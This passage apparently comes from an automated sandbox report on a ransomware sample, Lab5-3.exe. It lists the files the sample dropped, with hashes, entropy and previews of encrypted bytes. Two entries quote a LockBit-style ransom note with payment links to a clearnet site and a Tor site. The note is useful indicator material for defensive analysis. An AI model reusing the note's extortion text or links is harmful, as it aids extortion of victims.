                                                                                                          Category:dropped
                                                                                                          Size (bytes):22592
                                                                                                          Entropy (8bit):7.9918355160481545
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:uvP6/xqmOFINMwxt1nOG95DMxdffOOh1+mxsXo7wGW8+QfJDlZ+yg+Q6uHe+tb:OS/xqmOFkMG9+df2Oh1gXqldk+Ae+Z
                                                                                                          MD5:639C5E8510C1CE0EC6E07AA4C9F5B099
                                                                                                          SHA1:1204F030DDBCCB4840E37B1761FBE1CE8C96A68B
                                                                                                          SHA-256:6F69E0E8912CDA49DED29EC9B8D69DDA3F853270A767E7F18D9865C26F657EAB
                                                                                                          SHA-512:BE610E0BF19A16968B221F30F5AC8AEC3D6B8331BD39C912601D04B3FFE7A2FD74019ECC78F46DFD6207E5FEC740B9FBDEF6F6124574D59DF7C8E50D0F8402A3
                                                                                                          Malicious:true
                                                                                                          Preview:&.[1.....B]5.&b..^p....c..fg.z..O..n..;......j..O.tG!....t_.....}.. .0.E`...h"F....t......m..5m\r...%..}......\........H..b..i........[ON.V....f..aK.IT..A.........z....97$...6.<..p*.R.qe.{A&O7.....}o..kM.o..~6.so.Om....|./.X..U3X...G8.?.q.j...>g.......qsO1|...N+.N[...#..Q.".I..`.l.`..J;D..{...Y...=..3o.i ......E..pp....AD.....7..F$...O.1`....m.*)..[}....V.&...W.Z.....W.55DT.H..9.p.1...........Y....'.:.M.Y....bFM.sqN1...M......^...B...].q2.s.Hw..A...C.......f....X..Bm....9v..Ru......U........n....uz\..h.x\cj..X I...A.UD.."w..Qf..G....Ewm..g...vn..s..n.....O."..7...YP.Y4.;...,PV[.r.z5V..G.{'jru,W.v....G&...Gw.|R{`..^.7.Tx.;...w.x..K.R.P}l.r.~J.{-..._;./,...$....."#....m.KtC...W.C...._..Cw\l7....0`xE....Z..p>ENV.O.).T...|.fS.Xk..Zb^.^..E n...l..'..NU..8.0h.b.I..[.>..p{..u.).o..y.,.).#N6..B=M.P. G:..bNsl..>\..&.L..Db.." ....?..F........C.n.S.#.N+..30=.*.H$.5<....e5..k..Z_r.r.(+=m.+.Y.|.D..U.r.....\..Eq.)V....Y..b.,W.}..S.y..K.2..3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15632
                                                                                                          Entropy (8bit):7.988737005574659
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:qIor5oYcBIxnzxRsvNnayqOsaDolUQXFblvgqMHynA7oRiY76tYtb:lorWQQvNa3OsaUGIvgqMHynDRiSZ
                                                                                                          MD5:D6999090478B175A8D2E592049F62093
                                                                                                          SHA1:C884875D0F10E4DDA7F2CB1E78CDCD84C50C18D9
                                                                                                          SHA-256:4771CC32E9A10AC69797415B7863F23E741620F44AFE2D8707001EE5CF58B4FB
                                                                                                          SHA-512:D87BF79099A460FF553B38D4B5E8D2D6E836F5EBDD4FF2997DFD3263D3F9C68DC1FA1A5ABA3838A4C7F798BF52DEBEA6D73674CBF09089ECC7F0E16F6803E03B
                                                                                                          Malicious:false
                                                                                                          Preview:@...8,..t.q>....x0.SS..0.`........9...)x.".....C....B.........&..Lq.<.a...u..hEKaR(.#8.qJ..e.....d..o8...wm.....U....A..W....E.)..LkA.#...-0$O.&......9....}........j.p..w(.L....v.......cV..!*q.d....#.O.4.....&.~n......%..`uc.."p./....C.*....3.|.s#-.,.........o..zx.m|.wTj.F.....T?=py.T0^.....9%.Y.hH..`A...].!.K.......#8w... ..jC.q..r...z......,..E.l(....XHs..;......F....J.g.......8t....#...u"c..uJ..........!*.t?P.!.Q........3.AM.636y.|........b.QGd.1'....uX.Y..}...|.!.pt2=)...9.P?.v..w..O.....nyp.....gf...._.&K...?+Y."...=..c...,d.*?....`..p..P.i.9.-"0.U.Y.H+O|N.u..'..N...yb..uG.?.QaGJ.)..R..d...^@....Gk0..zj9..V..^h<.u..3.nZ8..kn..};.N.......X.D.G.~.J5..Z.p3Q.%.......i..........b.d+x....Fd...b5O./..y.O.A.6.....9.e%.s.<.......:.Qff.>~_.Iz3I....o...u?j.......NB....(u.kSR.....w.u.."..U....D...bQ..$...V.i4...b....Uj....Lu..).a.l...a.qh.]g.P..7.X..=.[(B9...'../...Q..H.M...a..j...:0..r7....].'%.uW..>.C......#Z.<X..l.:......4........g..P.VL.:.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16912
                                                                                                          Entropy (8bit):7.989504669291835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:mWrHor1BzkMqBJtpNusA/ETWSAyw+mqRJUfXXBcVQYXHFtb:5roBNs0SBpnUXX8hZ
                                                                                                          MD5:8D7220849100E42A932BECDDBB793B79
                                                                                                          SHA1:E9BFF43817EF4AEC3D752AF38117AFACEAAEE6D7
                                                                                                          SHA-256:C10A191D7B975CB7E416D32A55446B832B2F23A9EA92BB37C4E2B79B13296355
                                                                                                          SHA-512:30310AA8292CABA4E121D4F83D70F1BF99A000F4C1B972653D6DD7929D122C03183C268B0F5403BBA54294922CF9D27573A307ADEACAE368CB096984B23EF836
                                                                                                          Malicious:false
                                                                                                          Preview:..n.....T=i...9......9.......(.Qk..C.7s...g..[B..pwL.-.,...'..FF.a..EzL..S.G.?#.+.y?..v.*5...J...|.x.|g.L.ms{..Yj.Cl6.|^..py*....h.J....`.F...x.G.P.{N......6.W...........D.J..S.....n.i.%$..c.."^..5...Y..J..^......W]x.r]!..qg`...(7..Ey.3$...#........:....k.n.....z.~..<..F;.n.........U....5N..!..=..,..&....l7....D.~.EUQ..>.....*...iQ..K.&..x.......l>...(.J... .).G.*?,..h...6.......M..).Va..6.7......,.Rc. w.u./.se.X.KiL..{:.Jc.d.......r..=}..+o..D.`1..AF..........-1...p...../6.f....g..<.5.V..T.....U.Gj......Q'...w....d..g h..C...g.T....P.m....O%.+z....j..W.....>.........<~*Y[.*Y=..F..3.MR.....a.@.e[..<w.gS.;.1.....P.(>^.1E..T...%`i.X./.k..CYa..I.w..vB"..i......(..=E.R....s_..6..\nm.....wxg.....&.....V`..6...2.R?...)+...o.=HMbd....=.KC.9....$...F....n1.d...+...R3T..*[/.y.hH*..yofOs.^..>....\..........|...-4.f..\.Z....&..Lo.......0...1...GI.]..'...i(*..|...<....M.V..z...d..Cm(.D.#..3...)Fb2I..k.,....W.]<.z{.....)..`E.Q..o.\....{.#}^.`...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7456
                                                                                                          Entropy (8bit):7.974847999452056
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+i1ak6+ah+CFmg16ur+o+uRPQL/VID0Cb:+i1z9CFmzuiUm/VIDtb
                                                                                                          MD5:5F83176E3F646DC83B9010B4393C5121
                                                                                                          SHA1:C7AB46A56A64C5BDA54A3B833C678C0329CB854D
                                                                                                          SHA-256:10456D2D50CC8B54A8262E2B786342F6F59A7440CF4C6277AFDC3192415D8259
                                                                                                          SHA-512:AE91C7F2AA0CF791C98F34C85C1072F4ED8FFF76E0378E1F8549480F34D08678454EF802237A36965E3BF72D950E4A586B1FD9776DCD409D8A8FB62E2721C7CD
                                                                                                          Malicious:false
                                                                                                          Preview:..q8.G....h..U.6....S!....8_b..Ye.<l....$d..8..c..Ar.z..[..~.....Y?.M.^nuKc...=.t........~......Q........G.W^$...z..&6R..I....L.O.:^.s.F.<..4.W..R...6....@...I....z.k.HH#/..#..."!.....L.dTG..B!.H.,..=J!I....cC.....Nw...d9..=...Sm).,..1....`w.:.....lJ.ME.z....I&.8.NX......S.%M.'kk..z.w.J.`W...6[.R.M.....}..;I.6.'.H..B}.*...1.0....;...<.n...S....=TN...$.Z..k.-1...E_"...+&>..P.`i.....7G..OI..@.\...b .-PP).8`.7..e.}!.N..s,.u.Y[...r........(....Y5*..O...A.s..g..#.RFo..q[b"....nx.Y..c.'...0(......x(h..CK......^~.}.j...{...bc]{...u&...]=!#.^..@_.1.F............3..E...a...$.....J$R.>a..Q..iG.N......rRH...+|E...f.C...$|Z2r.`S.(d..T.....46IKs.Hg.P%.*0.@..d.w.C.9./.y6v.."pd.!*x.\........y..Uk?.K@k....T..2X..3A......n.X.7...43...W/.@...=..h....H.....K.?....G."eeN..N.1..3..E..Y....."A..n9.o....",i....d....Qe.E0....K.......>.zr6..9R..].#...B......"..~.E...d.y.c.....x..cPP.{.h .T...,.a!...h....w.......{.2...4.Z.....z...... ......g.......UG...gw.q .K.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8928
                                                                                                          Entropy (8bit):7.982031812068241
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:KQXWSoEMzRxRMsxmiClXHyblV5YwFdH5WM4d0Cb:KQsEIxXzClY5pWtb
                                                                                                          MD5:ED02A55D972B87474DC285179403BE49
                                                                                                          SHA1:9BEBA3A40EB46C4CBB4005CE01CD3948769475DE
                                                                                                          SHA-256:AD7E5F3B5D3177B34ABC953ABF62A7666B112065EBA713A2FDBDD33B746FE9E3
                                                                                                          SHA-512:A80E419ECFFE0A3CDD40BBE92A3BD1B470E826AA605CEA74BB86E6EBCDEF4444D0A17F2E5C4C182D757FFE9E24CE9AB49186151FA9B7DB977E29317514755EA0
                                                                                                          Malicious:false
                                                                                                          Preview:.3...(..j....7..c.7..XU.Xtx.}GQiI....'.w.b.....o.E....q.%........I....t.`.d....a.Cap../....E.#=.)2D..jt.D.?..^F?...Q.H.X},J.J.,..(.2Ku+..5..P..2.....`......V$3\.I./,x...&..tz............&O..+.....(C2..#...~!...h.......W.23f#..s.,...~..5C.&.K.F..k.D@/6.L....8.a.[ULeO^G...S...3{v..9......X.%D"...;.......U....]...7...|.RI*..<.N`..<.....h.L,ijZd.a.....(.. `..aM..4..z.n.e.:zF.}..@w......k..H.f..@.1B.F_Q.5..a.j...S.}....D+dkc$.qC%....C...b..L..-.S.5!.].~:.G...Bc.. ...P..~..}..j.%....5..C+.O>TC...g_p....ul..W.....z...oa...(..&N.(;..k......s9.u....DH..'.'.....,.nb..8h6G.e^...Dn.ag..L..K..Y.|..S.t+C\#.Y;.P9PS.#...'.....".k.....V....."-.RO.T..=e...J..67.z.6..../9...?q....a.AG....a...}?.N.,.=..m..f..*.Yi.wz.GR.XS..kJ.]#v?[....lc~.....k..;..)...=.X.$.4.(.Vy8..fbR.....\.h..!...<N.....1-V..O;..1."...2N._.......knhw..RD:.m.{...ZD.H...h..q...:..HK...g$...R.|@}..**.x....}1..q,t.HM.....4...O.g7.UR...,..\.....Sn)......g(..<}>Fl.DVi..m..`..s.....q%..5]:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11184
                                                                                                          Entropy (8bit):7.983024381705561
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6TCGlrVwaNF7ZKU5J+H4aQRW9ZNFrCkS1jBujccqweD5EL0Cb:kCcrVL7USQ9kkSFBuA6eOtb
                                                                                                          MD5:4EAAB4525AE6A747C987D112A609CA47
                                                                                                          SHA1:29889C8681A5D68292CE3C8F4AC74711E370BBF5
                                                                                                          SHA-256:C64D2248136B83A6BF8D8DEFE4D6D089C24B86F8C20B2644E2D4AC7F8DE0E1D0
                                                                                                          SHA-512:1CBD9484993908D49B1478141D498AED7575AB4FB8C92EF5E22C9495EA6BFA7B0770033116298BBA5D5610111EFFA60924C347494E4617601758E5524CC5C003
                                                                                                          Malicious:false
                                                                                                          Preview:........D.....].4oq`.ul.#=..D....H...8.r.=J....N.._p.......-...a.B....'...g..^..B.[.S..a+...*wCt..".6.o.O...C.(\#.........w.@(..t.-+.T...........W..|...%. .B...... .[..g..t*........WPK!.v....2:.sw.^*.H.}<4e..M..&cO.(..0.W=....$.Y?........P.....G...7...g..e../...-.@.*..,..G.&.3G.3,..g.*...(..S..1.........s".j..@._......v..g....0..!."8..X..S..9.j*.V.k/|as._.....O.....T..Ei..'.u......DU......no...@..j..6.6 gk.q..p...f,...2..HJ(W....*6.o..B.?1.xDr ...DL/.u.gx.J_.o...../1._...0...a(..Z Y.B.M..^r.;..qt.{\Y@!..z........G...L.,M.....5........C.......?..#....G.JM..9.M...uAKN.x...V....xx...l...iN.v..O<c....5..G.'B.+..Fu..QH...T.C...C2..A.dCB...2N..b.p....._n......m.0.k.....`.x.b..T...o/........YmE..e.rq..*...S2..9o.y`2I...(...3............D......1..T..d...B...%...Z.......E..dB_..E;.u...7(...Q..o<=DK.p#=....$.Tf.....M.1(....b.D..J..qp..{=.@..K.2f...1.r..7@....#V,.c....<..........w..2..%.V...L.:.|.E^=:....1.|.H.q.`"\....9..A0..........@..p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8672
                                                                                                          Entropy (8bit):7.976842906508443
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:mlTf91zbYV1grjUIRVZO1r7fNIZ/pysTqx0Cb:m9F1Suj7VZ8/NApysuxtb
                                                                                                          MD5:C60765CF1C9CB11A91E75534F3A7B48F
                                                                                                          SHA1:2A83EA023AC4D98BB68B98F76B4B17CCD6D2FD68
                                                                                                          SHA-256:8C32C8073A68F977939304679038F3713E87EC7E252BCC214CF7285E7FF8B791
                                                                                                          SHA-512:FD72F063F7DDA831C6F9F1E607EE9C767F9B4097BAC7D5126C9AD30AA434FAF7DDD6B9DECE4D91D0B2EE62B4816F5E32A1766E0844E913E843D71AC77347B15D
                                                                                                          Malicious:false
                                                                                                          Preview:...pff.enE......A.bv..p...V.HY.go...Z.:.;u..d.&.7...>..v~/...u...Dlt..:...9.._{.v.aQ.4!.(To[&.k#.:.D(.J'.c.y....2*.4mR..........Rl.p..j....b;U..w.................+..(...u.=.e&.....H..}.V..Xe.h.+.....r5..{....yG.9...D.].8.\....?-.....&.........c.....V........./.8.>.'.....OKi...c..]...p.).C....vxfE..G....g.j..[=.F..8..Q............%@w..]+(. ...Lmsb..[N....3..0}.z&..I..PL.vT./.Ea..hEh....eN{a.....{.[-.......YI.0e.(..4...t.!.L..c..N.ar.V.C."..g.....8SU......,t...H..+.)..!.J{s.o....9....@...<.).;...D.../e..W.X"N....Ou....g..,EF...85-....<...$.%..v....Q.t....Kq&Q.H)...$.....9..q.{I...|h'.}.hz{....2HV..:...7g.X8....i.v.p..-.p`>R).....'\\.....SJ.....c../^.p.l....UK<Y@.(.]).[..O..........V.^....0..T{..Mc...N .(D=6.C.:Y.Ct.M....?v.Pj.kx....+....q$..d.v.:!...........FE....QF.....9k..q....l.........gfi....Xc}=.>.kz+.M.......n.....0Jh..."...7.K..P....J.A.+..C>.._..&..^Q..|..}...D.....\e.W<..~y..%\....3........Q..F.D.^S@..7.......E..[.nLf....r....pI.....X.>&Kcy
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8304
                                                                                                          Entropy (8bit):7.977501590463904
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:rsGYo8s4H/nhdqCOsC9MwU+2kGvQysGqITXyxZm0Cb:dYo8s4H/O5LUPmoq5xctb
                                                                                                          MD5:EAAEDFDC52331573C2B92E3C24E4B8A7
                                                                                                          SHA1:0EBCAC42B4EE75BDC9D8B15D0A03E901EB63622A
                                                                                                          SHA-256:A8CF19554ACF863CB4C44D3D9CEF96E977BE363B39A8221AC23C2501B518AACB
                                                                                                          SHA-512:13773DBCC98D7D82C636E5AB2DB4467C13AF6F924A86B815F95F5A4EFC5B5C569EFFC143F77EF9C28BFD3A4D9C4B14AEC9EF0F48D90E1DABC0FF748203B1D773
                                                                                                          Malicious:false
                                                                                                          Preview:-o.......<..5!.>`.l.......".....#xP.vc.+.D....6..I....j...\..9t..k_j...I...h.=.n<........WUPaJ. ..'.S3..7.o.Z/r.c.s>9z.l.......z<.D..2WZ.....?.ty....jo.%........j...."9yQ....d`..x.L..b!.j..B..J ...........X.cN..y.H........A.U0........6s....kqi...1T.B..;.f4..........B..-......Z._MFY!m....R....o..eX..1Y..\.]}CW.D^*s.O..2...<.I..2.....B...nS.kA.:.. t..t.iG.G]...........8...x(...EWI....$..{.'.c.....L..c5f.;.^5..]).G2.7vt.S.._ .Vd.#\....i.Hy.a.P.......7\...$...r.b........<})+.m.'.f.?.Qp.+=.z.......1..*.9y...p.z..>N..Z.hCfT.......J....<?^.c.V.aG.M...8.............H..\.g....k....:.9R...0...U.?.J...,......m....i.F...|.$......L...+B......:..}.x.R.Z4H..b......|.f..@.z.=..b....5.I...5d..m=u[K.F....Z....iH.6..Ai/.ZR...~......b.......z...X.=d.?}]..c'|.]0.b.*.-w..yJ]f.{.q#.....^.'9..n...."...g.7.}.d...._..r...!/d..t.U.?.+m.@.!A..l.HB.(..:..GCi...HK...~H..S.:.B.;.`Q............M..o..f...=&..f./.;...w...+..e..H.-..........7 ]&...y...F....l@..$.]3%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8288
                                                                                                          Entropy (8bit):7.975698608786993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3rxbwQgzwjWC6zFy4WGOwBy7yyQqn9AYVu0Cb:3tbwdydIy4TyGy5nBgtb
                                                                                                          MD5:502EEEAE65E7785802F6151F444E5798
                                                                                                          SHA1:D7F469BCD7B62C47725ED6D1A8F2ED85161C54B5
                                                                                                          SHA-256:D79260BF5286F9D0CD003960A2AFA5AA5484921C74009FBBB8F0763B27ECC512
                                                                                                          SHA-512:78C4019A4DC409F54B9462E490BE9F4265DBF162E41BF49A5E0860221C4CE87A4ABA41F01A260F1C1EC9B796C1D3069C9FF9E503CD3CE4190FCF31237F6CA2FF
                                                                                                          Malicious:false
                                                                                                          Preview:.cL".^J!.H#......O........"..2}.U!....2...E..7........*h.SL....G..]...>s..kz-z..#...#..t.9.Dl.X.....*..}....,R.}:..MPa.<.....l."R........."g.I._7..(..q<>.s..DiE..4`*....ag+..).b...._.HM..B......^..=zo..+C.+.......`...kA.c.9......8+.Kukg........r}Y6..Q.Zz.&^V.r.$vY.......{.k{.....#AF..Yo...5)....O..d.Q7ncj.+.^.....c8..e.....1....]..w...p.K.W.!.^................4...k.z...V....(..^........PX....g...m..*1. ......s......]x...(.......3....u\...kftZ.[.'.......].....m.T?K..O.eD...=...._.2S..iu..B..A*I.JX..v.wM..e..zq.......!*.N...3.Y.6..U..G.....x...*S<.......=.A.%.t&.$3..J...0$....I....X....+..C.*....a.O..}<^7......2VG..v..w,>z..d..W9y...p.f.........9ih..g...."L.f.. ^....#.)^7....c...X.ey.@B0.Lx....d..Qf.*.(.....p.!.TH..i.6.d..3P.....O......H3c~..>.fG..7[.3.)...Y..bW.U?.9|....{.P.fd.O..2Y..b.~d.x......+8...7{..Ap-...Wh.w.NC....X.H..G._."...5.1"K.=.k.L......~..G;.y.I..?..`....~R..4!.$=.9Lc.}.#..{.|C.H....K>..9........=...\~.?.I.^....n4......P.I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6768
                                                                                                          Entropy (8bit):7.968320735483616
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:NTlRtubWYgmF6dFIDg+qPy3qX+Vnynyt9A0Cb:NtubZXFQFI4BMnF9Atb
                                                                                                          MD5:4E6543B331A9C96A63ABEE16B64A99A1
                                                                                                          SHA1:2C4F93D515BB53E8C6D28FCE92433F11E8029B8F
                                                                                                          SHA-256:D7D88BAEBF7BD05E9E72C5D13346E51E3C70C885B52ED1B9180DDCA2B796EFB0
                                                                                                          SHA-512:36BFF97CBA038B3B6F1B6B6ED3C43686DD51E1F248676F32E2C9246D9EA20C43F114028D610AFD9F7A157F68330E6C1E74A159F9ABB778F68E7168EFCB647CD4
                                                                                                          Malicious:false
                                                                                                          Preview:K.../...M.t(L$.....hc-.....\..d...N.j.).._...e2..$..c.f.zU<..B0..A*......i..n.O............g..+..z..Ur.~.6U..+.~'......=I........E..1..Y`...........An}'.........%Rj...X.5..!.|...6..=.........;N..)..a3)..+...%p..3...+....0.9`_*...80...K..f.23..5K9..7hRP;..RPq......`..Iu{&.....SM....0H..[.H...\.Sb8..B9/.4.%`..........|..q.s.=...9x.........&....;.^.5..D...R.Y.wy@......$......B....T.s..H.....=.[...y`.K...q.5....~.'{....0;...1.{l....O..........sX=.t.....I...I."!I.]..,..re...?t..z....;.../<.z.....$.........xP....3. m.....W,.`.Z.B...d.......7...c....)...M_-Wl...VO..dX..V.uV._......v.?..\...0.z..'.2<s.np..../.....a6.....%..y....jt..9.1.<C...-2.q..I...`...X..,. @.......ye..i8`*#./M..y3.<.*\...{h.A.....q..0...*,..$.m.........n..B...e4...QIp.......{.^....]......ER...-.^..9..b(...;Y.F...t...0.....`8..%BD.\-...Z.9y.EU.}...y'.s#...........:.4.....2...S.R.T...f..~.!....wT....8. a..{,gP..a.7=.h@..^p.6.....T.>L*......$.V..{|..N..MwInW........x..9.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6960
                                                                                                          Entropy (8bit):7.971492061170261
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ytVd3Vh4/0Zl8WB6cGpT749kb4b2QKerkD0Cb:+V+sl8WBMS9krQKe0tb
                                                                                                          MD5:D10C7DD5CDCA1BB392434FA3E6D13F2A
                                                                                                          SHA1:9CE7FF70F200EE6E791C0BF670D59AB6D911CB57
                                                                                                          SHA-256:01DC4CB254B9426536F9424E39B2A0FC696F13E247B24ED7FD29D5545F8EB011
                                                                                                          SHA-512:E6F841CFBDFC007ECAA07B325A5DEF339DD4DBC78878454A5A9AD68855DBF23625F691597D27525AD3519B2D6FD4CC27B400B323B60FA2374748207BC5F57B03
                                                                                                          Malicious:false
                                                                                                          Preview:.. I.+.....M/9A.5...K...sE......$.+5q.^...<.*N:.N.\..Y...1.f.....G...&y,..v..Md.gZ..Y.b....;..-....8:...n9]E..C.H... ...<XY}.Th..V.d.[m......"...2.D....m....6..c....N.....5.<.4..\4..}.......z~D..GW..'Z..f(m...p...e..(w;.......m..t.....H...o.7|...{...3......1ls...A^S..=0Y.DW;H.l?.Q........<(...E.D~`.X...}Y..........qG..h.^.&.Fxi..#...%C.b...F.J.......s... .34..B]..JP.....Y...C.5X.Yw.IP..6.4*..'..Y.GZj.D.b...v...d..|F<..B.k}..vQ.eb..a..'iI...D...D....X..d...j...D...o.5.....-Hf4...f.=....E.#9..X....*.\.h...t.o.... kX..v.!....&ghn.Wt].......U...Y..tqq.mR....|.CW....G...;......?~...G.o|f.b.`...2xJ.k!.]..3...u.&t|X8..mCq.Fy....)lo....G7d........g.<.$.Xg*...Z...L2..eF........".h ......T..sK..9)[t..b'j.h...!.......F.s(H.q}.K.x.-3..(*.BH..._].Z.k..h.K.E8_..~..L..u8w2....v...(yI.?'...._.:U...{F.+.B..3H....W.E..+.9..c..O....,..N.Zj.Y..Mw5M.n.N..*.5~.....:l....,.~.L..x"..".."...A.h4...YT.;z..|...n.;.s2.r..'K. ..$~....f.YT.0R.......d.:-.........pFr....1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7248
                                                                                                          Entropy (8bit):7.973854623769342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:bRkUKAUEFx2ARJPuEiG7a2e00f7tBZwP8M2ZU9lsXAxCYcZgzuKwoXNH9h+hUOE/:l7KAUupi0+Xn7O//rcZOvrtah9E10Cb
                                                                                                          MD5:6BD7BCC618668843A3A8DE90546ACB6F
                                                                                                          SHA1:0FCE61555526E632292309C2FFC15CEB2B6B0817
                                                                                                          SHA-256:A3518D157C0FB45DE9557F3F193BD2F9A7F435375B78E5D92295CFDE40B60A7F
                                                                                                          SHA-512:542FCE9A06FF17460F409E6CA68C06683DEBA153571DA3B03C6A4FCF396A10907C7284DE146216628CC31495771555D16A1BCD7DBF807B61B6DF900D5BDA8F56
                                                                                                          Malicious:false
                                                                                                          Preview:.Bju..r!gA..._.C....uBt....4R4R..{.W.....FG.._g...!(WOP/R).....U(..P......Nx.lQ.\..vK.1..z.N@a......f.Z.>T.:...J.x.N/{9b..."....I.SQ.. ..(...K.2G.V..A&...w...O;.....F....K..S.>..+........1.....c.....G.v;.{<l...v.6*a..Q..5..J.?.4Y.v1R.T..:.j.4c......"M.VM1.m:.v.m.S..kW... ...P...h..+%HdO.t.i....U.`{...]^J".u...6[...|)..x..Y...._.T..se..?.L..0B..2.w.B.A.O{LB<......bQ<.....xY`....Rw6.".J.6..wc`G.qc....4z.u.O....:...=..j0A.r.u`.n...=m.tE!S.S...|.......19?...#.:....<..w...<,h..u.....'.R...V..T..'....s.....C*P.#;.|.l...z.#....5..kp.+..h&..w.O[..Z.I./..e'..?m._.....d.U-.g..e.j'.......!}.'.e....9vM.F.3...H+S.............%.J..$..w.g....5.E....`....~9..fA('.....s.+.O....ZD....g12..sc#.;.u....p...n.Mc...................m.H....!<...Z6...f}..v...?..N.$..8i... ..u...uzgqZU.*E.}.H..m...."C....7.......!-...8......!y.S....?x.[..A>........u.....c5."..v..(.0gT1...(Cd..#{...1._..M........m"-....z....4.. ...u..T..4i.P.+..s.e....N|..2...7.......F...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7904
                                                                                                          Entropy (8bit):7.971109394408458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Q2fSMqvf188X2wToBgiGPqdWVgThNgDg991me0Cb:N8vtpX5q9tNgDg9Ketb
                                                                                                          MD5:D2277A233D660F9DEF7E1389504BC5B0
                                                                                                          SHA1:1C95F50FF58D02D9A544FDBBB6889929B8BE0B6D
